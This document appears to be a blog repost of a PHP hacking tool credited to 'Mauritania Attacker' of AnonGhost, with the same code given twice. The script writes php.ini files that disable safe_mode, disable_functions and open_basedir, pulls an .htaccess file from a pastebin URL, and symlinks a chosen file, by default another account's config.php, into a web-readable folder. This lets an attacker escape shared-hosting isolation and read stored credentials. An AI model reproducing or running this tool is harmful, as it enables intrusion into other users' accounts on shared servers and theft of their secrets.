[PHP] Virtual Bypass Via Error_Log
<?php ?><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bypass Symlink 2014</title><link rel="shortcut icon" href="http://www.iconj.com/ico/2/j/2j62fbaa2w.ico" type="image/x-icon" />
</head>
<?php
// Extract php.ini //
$fp = fopen("php.ini","w+");
fwrite($fp,"Safe_mode = OFF
Safe_mode_gid = OFF
Disable_Functions = NONE
Open_basedir = OFF");
echo '<br><b class="cont" align="center"><b class="font-effect-fire-animation" style=font-family:Ubuntu;font-size:25px;color:green;>Virtual Bypass Via Error_Log Coded By Mauritania Attacker</b></b><br><p align="center">';
echo'
<form method="post">
<input type="text" name="file" value="/home/user/public_html/config.php" size="60"/><br /><br />
<input type="text" name="ghostfile" value="ghost.txt" size="60"/>\!/ do not change the name config.txt \!/<br /><br />
<input type="submit" value="Bypass" name="symlink" /> <br /><br />
</form>
';
echo '<div class="tul"><b>PHP VERSION:</b> <font color="009900" face="shell, Geneva, sans-serif" style="font-size: 8pt">';echo phpversion();
$fichier = $_POST['file'];
$ghostfile = $_POST['ghostfile'];
$symlink = $_POST['symlink'];
if ($symlink)
{
$dir = "error_log";
if(file_exists($dir)) {
echo "<br><font color='red'>[+] error_log Folder Already Exist °_° are you Drunk XD !!!</font><br />
";
} else {
@mkdir($dir); {
echo "<br><font color='red'>\!/ error_log Folder Created ^_^ \!/</font><br />
";
echo "<br><font color='red'>\!/ $ghostfile Retrieved Successfully ^_^ But click on the Blue Link \!/</font><br />
";
} }
// Extract php.ini + .htaccess //
$priv9 = "Safe_mode = OFF
Safe_mode_gid = OFF
Disable_Functions = NONE";
$f =@fopen ('error_log/php.ini','w');
@fwrite($f , $priv9);
$homepage = file_get_contents('http://pastebin.com/raw.php?i=xhKk9zVK');
$f =@fopen ('error_log/.htaccess','w');
@fwrite($f , $homepage);
@symlink("$fichier","error_log/error_log");
echo '<br /><a target="_blank" href="error_log/error_log" >Click on ======> error_log</a>';
}
echo"<h3>
GreetZ To : AnonGhost - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG</h3>
";
echo"AnonGhost Team";
?>
<head>
<title>Bypass Symlink 2014</title><link rel="shortcut icon" href="http://www.iconj.com/ico/2/j/2j62fbaa2w.ico" type="image/x-icon" />
</head>
<?php
// Extract php.ini //
$fp = fopen("php.ini","w+");
fwrite($fp,"Safe_mode = OFF
Safe_mode_gid = OFF
Disable_Functions = NONE
Open_basedir = OFF");
echo '<br><b class="cont" align="center"><b class="font-effect-fire-animation" style=font-family:Ubuntu;font-size:25px;color:green;>Virtual Bypass Via Error_Log Coded By Mauritania Attacker</b></b><br><p align="center">';
echo'
<form method="post">
<input type="text" name="file" value="/home/user/public_html/config.php" size="60"/><br /><br />
<input type="text" name="ghostfile" value="ghost.txt" size="60"/>\!/ do not change the name config.txt \!/<br /><br />
<input type="submit" value="Bypass" name="symlink" /> <br /><br />
</form>
';
echo '<div class="tul"><b>PHP VERSION:</b> <font color="009900" face="shell, Geneva, sans-serif" style="font-size: 8pt">';echo phpversion();
$fichier = $_POST['file'];
$ghostfile = $_POST['ghostfile'];
$symlink = $_POST['symlink'];
if ($symlink)
{
$dir = "error_log";
if(file_exists($dir)) {
echo "<br><font color='red'>[+] error_log Folder Already Exist °_° are you Drunk XD !!!</font><br />
";
} else {
@mkdir($dir); {
echo "<br><font color='red'>\!/ error_log Folder Created ^_^ \!/</font><br />
";
echo "<br><font color='red'>\!/ $ghostfile Retrieved Successfully ^_^ But click on the Blue Link \!/</font><br />
";
} }
// Extract php.ini + .htaccess //
$priv9 = "Safe_mode = OFF
Safe_mode_gid = OFF
Disable_Functions = NONE";
$f =@fopen ('error_log/php.ini','w');
@fwrite($f , $priv9);
$homepage = file_get_contents('http://pastebin.com/raw.php?i=xhKk9zVK');
$f =@fopen ('error_log/.htaccess','w');
@fwrite($f , $homepage);
@symlink("$fichier","error_log/error_log");
echo '<br /><a target="_blank" href="error_log/error_log" >Click on ======> error_log</a>';
}
echo"<h3>
GreetZ To : AnonGhost - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG</h3>
";
echo"AnonGhost Team";
?>
[PHP] Virtual Bypass Via Error_Log
Reviewed by Nguyen Nam Hong
on
11:06 AM
Rating: